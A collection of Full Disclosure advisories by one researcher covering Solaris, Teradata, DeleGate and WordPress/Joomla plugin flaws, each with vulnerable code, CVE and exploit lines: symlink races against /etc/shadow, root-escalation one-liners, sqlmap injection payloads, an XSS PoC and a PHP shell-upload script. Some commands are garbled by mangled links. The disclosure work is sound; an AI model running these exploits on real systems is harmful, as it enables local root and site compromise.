[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

[Larry W. Cashdollar via Fulldisclosure]

Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 
leads to root

Author: Larry W. Cashdollar, @_larry0

Date: 2020-02-02

CVE-2020-14724

Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html

Vendor: Oracle, fixed in July 14 2020 CPU 
https://www.oracle.com/security-alerts/cpujul2020.html.

Vendor Notified: 2020-02-02

Vendor Contact: secalert...@oracle.com

Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices 
on your installed system and the drivers that manage those devices. The DDU 
reports whether the currently booted operating system has drivers for all of 
the devices that are detected in your system. If a device does not have a 
driver attached, the Device Driver Utility recommends a driver package to 
install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack: 

In ./ddu-text/utils/ddu-text.py 

18 LOG_LOCATION = "/tmp/ddu_log" . 

45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 

50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, 

Elevation of priviledges via symlink attack due to chmod operation on /tmp 
file: 

In file ./ddu-text/utils/inner_window.py 

667: logfile = open('/tmp/ddu_err.log', 'a') 

695: logfile = open('/tmp/ddu_err.log', 'a') 

721: logfile = open('/tmp/ddu_err.log', 'a') 

748: logfile = open('/tmp/ddu_err.log', 'a') 

In file ./scripts/comp_lookup.sh 

33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh 

38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh 

449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh 

20:typeset err_log=/tmp/ddu_err.log 

There is a race condition here between file creation and chmod 666 where a 
local user can run a simple script to ensure the symlink exists after the 
ddu_err.log file is removed: 

In file ./scripts/probe.sh 569: 

# Make /tmp/ddu_err.log writable for every user 

571: if [ -f /tmp/ddu_err.log ]; then 

572: pfexec chmod 666 /tmp/ddu_err.log 

574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 

636:typeset err_log=/tmp/ddu_err.log 

These are also potential file clobbering issues: From probe.sh 

131: NIC_info_file=/tmp/dvt_network_info_file 

133: temp_file=/tmp/dvt_network_temp 

134: temp_file_2=/tmp/dvt_network_temp_2 

207: c_file=/tmp/str_ctrl_file 

208: c_file1=/tmp/str_ctrl_file_1 

209: c_file2=/tmp/str_ctrl_file_2 

210: c_file3=/tmp/str_ctrl_file_3 

211: c_file4=/tmp/str_ctrl_file_4 

212: c_file5=/tmp/str_ctrl_file_5 

328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 

329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 

330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 

398: temp_file1=/tmp/dvt_tmp_file1 

399: temp_file2=/tmp/dvt_tmp_file2 

462: cpu_tmpfile=/tmp/cpu_tmpfile 

490: memory_tmpfile=/tmp/memory_tmpfile 

624:typeset ctl_file=/tmp/dvt_ctl_file

 

Exploit Code:

1. Tested on Solaris 11 x86

2. larry@SolSun:~$ uname -a

3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

4. and

5. Open Indiana 

6. root@openindiana:/export/home/larry# uname -a

7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

9. Append content to /etc/passwd

10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log

 

12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow

13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow 
ddu_err.http://www.php.net/log; done

14.  

15. A better exploit:

 

https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

 

Patches to OpenIndiana

https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

 

 

 

 


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

[Larry W. Cashdollar]

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 
3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Description: Mobile App WordPress plugin lets you turn your website into a 
full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php 
doesn't require authentication or check that the user is allowed to upload 
content.
It also doesn't sanitize the file upload against executable code.

http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php;
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin

[Larry W. Cashdollar]

Hello All,

These are really great advisories, my only wish is that they were copied to the 
security lists in their entirety.  This way we aren't relying on a single point 
of failure (your website) when looking for the data in the future.

Thanks!
Larry

> On Nov 19, 2016, at 5:48 AM, Summer of Pwnage  wrote:
> 
> 
> Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
> 
> Yorick Koster, July 2016
> 
> 
> Abstract
> 
> A Cross-Site Scripting vulnerability was found in the WP Canvas -
> Shortcodes WordPress Plugin. This issue allows an attacker to perform a
> wide variety of actions, such as stealing Administrators' session
> tokens, or performing arbitrary actions on their behalf. This issue can
> be exploited by authenticated users with the Contributor or higher role.
> 
> 
> OVE ID
> 
> OVE-20160724-0031
> 
> 
> Tested versions
> 
> This issue was successfully tested on WP Canvas - Shortcodes WordPress
> Plugin version 1.92.
> 
> 
> Fix
> 
> This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin
> version 2.07.
> 
> 
> Details
> 
> https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
> 
> 
> Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
> goal is to contribute to the security of popular, widely used OSS
> projects in a fun and educational way.
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

[Larry W. Cashdollar]

Title: /tmp race condition in Teradata Studio Express v15.12.00.00 
studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: 
http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool 
that retrieves data from Teradata Database systems and allows the data to be 
manipulated and stored on the desktop. It is built on the Eclipse Rich Client 
Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in 
/tmp insecurely.  A malicious local user could create a symlink in /tmp and 
possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:  jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
Export: JSON TEXT XML
Exploit Code:
• $ ln -s /tmp/javaver /etc/passed
Advisory: http://www.vapidlabs.com/advisory.php?v=174

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

[Larry W. Cashdollar]

Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of 
files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine 
image for developers and community use.
Vulnerability:
 Teradata Virtual Machine Community Edition v15.10 Insecure creation of files 
in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr 
>/dev/null 2>&1` ;

If a regular user controls  /tmp/t2a.pl.get_profile.scr before the person 
executing this script creates it they can inject
commands to be executed as that user.

for example:

$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; 
done

If root or any other account runs that .pl script I see these files being 
created in /tmp

[C] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[U] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 44  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 152  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[C] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr 
 

CVE-ID: CVE-2016-7489
Exploit Code:
• $ while(true) do echo "chmod 666 /etc/shadow" >  
/tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission

[Larry W. Cashdollar]

Title: Teradata Virtual Machine Community Edition v15.10 has insecure file 
permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
 
<http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware>
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact
Description: A database appliance for virtual machine environments.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 has insecure file permissions 
on /etc/luminex/pkgmgr. These could allow a local user to modify its contents 
and execute commands as root.

TVME:/ # ls -ld /etc/luminex/
drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/
TVME:/# ls -l /etc/luminex/
total 128
-rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db
-rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr

CVE: CVE-2016-7488
Exploit Code:
• $ echo "#/bin/bash" > /etc/luminex/pkgmgr
• $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
• $ chmod 755 /etc/luminex/pkgmgr

Advisory: http://www.vapidlabs.com/advisory.php?v=172 
<http://www.vapidlabs.com/advisory.php?v=172>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

[Larry W. Cashdollar]

Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your 
website. If you wish to show your photos, videos, enclosing the additional 
images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection 
against the functions in ajax_url.php:

In file ajax_url.php:

  11 define('_JEXEC',1);
  12 defined('_JEXEC') or die('Restircted access');
.
.
.
  49 $page = $_POST["page"];
  50 $num=$_POST['perpage'];
  51 $start = $page * $num - $num;
  52 $idofgallery=$_POST['galleryid'];
  53 $level = $_POST['level'];
  54 $query = $db->getQuery(true);
  55 $query->select('*');
  56 $query->from('#__huge_itportfolio_images');
  57 $query->where('portfolio_id ='.$idofgallery);
  58 $query ->order('#__huge_itportfolio_images.ordering asc');
  59 $db->setQuery($query,$start,$num);

CVE-2016-1000124
Exploit Code:
• $ sqlmap -u 
'http://example.com/components/com_portfoliogallery/ajax_url.php' 
--data="page=1=*=huge_it_portfolio_gallery_ajax=20=2"
  --level=5 --risk=3
•  
•  
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep 
testing the others (if any)? [y/N] 
• sqlmap identified the following injection point(s) with a total of 
2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1=-2264 OR 1 GROUP BY 
CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 
END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#=huge_it_portfolio_gallery_ajax=20=2
•  
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1=(CASE WHEN (9445=9445) THEN SLEEP(5) 
ELSE 9445 END)=huge_it_portfolio_gallery_ajax=20=2
• ---
• [13:30:39] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [13:30:39] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2715 times
• [13:30:39] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/192.168.0.4'
•  
• [*] shutting down at 13:30:39
Advisory: http://www.vapidlabs.com/advisory.php?v=170

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

[Larry W. Cashdollar]

Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: 
Huge-IT Product Catalog is made for demonstration, sale, advertisements for 
your products. Imagine a stand with a 
variety of catalogs with a specific product category. To imagine is not 
difficult, to use is even easier.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 

Vulnerable Code in : ajax_url.php

 11 define('_JEXEC', 1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' 
--data="prod_page=1=load_more_elements_into_catalog_id=*_count=*_into_page=*_thumbs=*_description=*=*"
  --level=5 --risk=3
•  
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: 
prod_page=1=load_more_elements_into_catalog_id=-2369 OR 1 GROUP BY 
CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 
END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#_count=_into_page=_thumbs=_description==
•  
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: 
prod_page=1=load_more_elements_into_catalog_id=(CASE WHEN 
(7371=7371) THEN SLEEP(5) ELSE 7371 
END)_count=_into_page=_thumbs=_description==
•  
• Type: UNION query
• Title: Generic UNION query (random number) - 15 columns
• Payload: 
prod_page=1=load_more_elements_into_catalog_id=-5943 UNION ALL 
SELECT 
2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)--
 FvOy_count=_into_page=_thumbs=_description==
• ---
• [16:48:10] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [16:48:10] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 6637 times
• [16:48:10] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/example.com'
•  
• [*] shutting down at 16:48:10
•  
Advisory: http://www.vapidlabs.com/advisory.php?v=171

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla

[Larry W. Cashdollar]

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site: 
http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: i...@huge-it.com
Description: The plugin allows you to add multiple images to the gallery, 
create countless galleries, add a description to each of them, as well as make 
the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to 
the administrative panel to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as 
description,image_url,sl_url,sl_type,link_target,#__huge_itg 
allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => 
'#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg 
allery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = 
gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62 
64 $db->setQuery($query);

65 $results = $db->loadObjectList();
66 return $results;
67 }



XSS is here:

root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} 
\;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} 
\;
256: 
CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection
JSON: Export
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=SQLiHERE

$ sqlmap --load-cookies=cookies.txt -u 
"http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=*;
 --dbms mysql
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=164

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Local root vulnerability in DeleGate v9.9.13

[Larry W. Cashdollar]

Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
http://delegate.org/delegate/

Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.s...@delegate.org ys...@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays 
various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, 
Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and 
more. DeleGate mediates communication between servers and clients where 
direct communication is impossible, inefficient, or inconvenient.


Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least 
one of these binaries can be used to escalate the privileges of a local 
user.  The binary dgcpnod creates a node allowing a local unprivileged 
user to create files anywhere on disk.   By creating a file in 
/etc/cron.hourly a local user can execute commands as root.


Installation of software via source or binary distribution with option 
to not run as root results in a script set-subin.sh to run setting the 
setuid bit on four binaries.  In Linux distributions where this software 
is part of the package list these binaries are not setuid root. (archlinux)


From documentation http://www.delegate.org/delegate/newbies-ja.shtml 
(translated to english):
Go is included in the binary distribution, or DGROOT that you can build 
from the source to the location of preference, and then change the name 
if necessary. This is the DgRoot. In addition, if needed, you can rename 
the executable file of DeleGate to the name of the preference. This is 
the DgExe.
"In Unix version subin in if you want to use "(such as when using a 
privileged port), do the following.


  (3-2uk) $ cd DgRoot / subin
  $ Sh setup-subin.sh

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi
CVEID: 2015-7556
Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme 
/etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' 
> /etc/cron.hourly/rootme



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

[Larry W. Cashdollar]

 On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote:
 
 Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
 Author: Larry W. Cashdollar, @_larry0
 Date: 2015-07-09
 Download Site: https://wordpress.org/plugins/mailcwp/
 Vendor: CadreWorks Pty Ltd
 Vendor Notified: 2015-07-09 fixed in v1.110

Typo should be v1.100.



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

[Larry W. Cashdollar]

Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client 
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php  doesn't check that a user is authenticated or 
what type of file is being uploaded any user can upload a shell to the target 
wordpress server:

  2 $message_id = $_REQUEST[message_id];
  3 $upload_dir = $_REQUEST[upload_dir];
.
.
  8 $fileName = $_FILES[file][name];
  9 move_uploaded_file($_FILES[file][tmp_name], 
$upload_dir/$message_id-$fileName);

Exploitation requires the attacker to guess a writeable location in the http 
server root.

CVEID:
OSVDB:
Exploit Code:
• ?php
• /*Larry W. Cashdollar @_larry0
• Exploit for mailcwp v1.99 shell will be called 1-shell.php.
• 7/9/2015
• */
• $target_url = 
'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1upload_dir=/usr/share/wordpress/wp-content/uploads';
• $file_name_with_full_path = '/var/www/shell.php';
•  
• echo POST to $target_url $file_name_with_full_path;
• $post = array('file' = 
'shell.php','file'='@'.$file_name_with_full_path);
•  
• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo hr;
• echo $result;
• echo hr;
• ?
•  
Advisory: http://www.vapid.dhs.org/advisory.php?v=138

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1

[Larry W. Cashdollar]

Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images 
uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is 
requesting files from the uploaded images directory only.  And line 8 attempts 
to
unlink the file after being downloaded.  This script could be used to delete 
files out of the wordpress directory if file permissions allow.
 
  1 ?php
  2 if ( isset( $_REQUEST['file'] )  !empty( $_REQUEST['file'] ) ) {
  3 $file = $_GET['file'];
  4 
  5 header( 'Content-Type: application/zip' );
  6 header( 'Content-Disposition: attachment; filename=' . $file . 
'' );
  7 readfile( $file );
  8 unlink( $file );
  9 
 10 exit;
 11 }
 12 ?
CVEID: TBD
Exploit Code:
• $ curl 
http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3

[Larry W. Cashdollar]

Title: Remote file upload vulnerability  SQLi in wordpress plugin 
wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plug...@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch 
enabled with great features. This gallery is compatible wiht iphone and ipads. 
It is also allow us to use it as a widget.You can also enable this Powerplay 
Gallery on your wordpress site by placing code snippet in your template (.php) 
files. It shows flash gallery for desktops and touch enabled version for ipad 
and iphones.
Vulnerability:
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58 @mkdir($targetDir);
59 }  

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or 
where they should be placed:

138 // Open temp file
139 if (!$out = @fopen({$filePath}.part, $chunks ? ab : wb)) {
140 die('{jsonrpc : 2.0, error : {code: 102, message: Failed 
to open output stream.}, id : id}');
141 }
142 
143 if (!empty($_FILES)) {
144 if ($_FILES[file][error] || 
!is_uploaded_file($_FILES[file][tmp_name])) {
145 die('{jsonrpc : 2.0, error : {code: 103, message: 
Failed to move uploaded file.}, id : id}');
146 }
147 
148 // Read binary input stream and append it to temp file
149 if (!$in = @fopen($_FILES[file][tmp_name], rb)) {
150 die('{jsonrpc : 2.0, error : {code: 101, message: 
Failed to open input stream.}, id : id}');
151 }
152 } else {
153 if (!$in = @fopen(php://input, rb)) {
154 die('{jsonrpc : 2.0, error : {code: 101, message: 
Failed to open input stream.}, id : id}');
155 }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159 fwrite($out, $buff);
160 }

3. Sql injection 
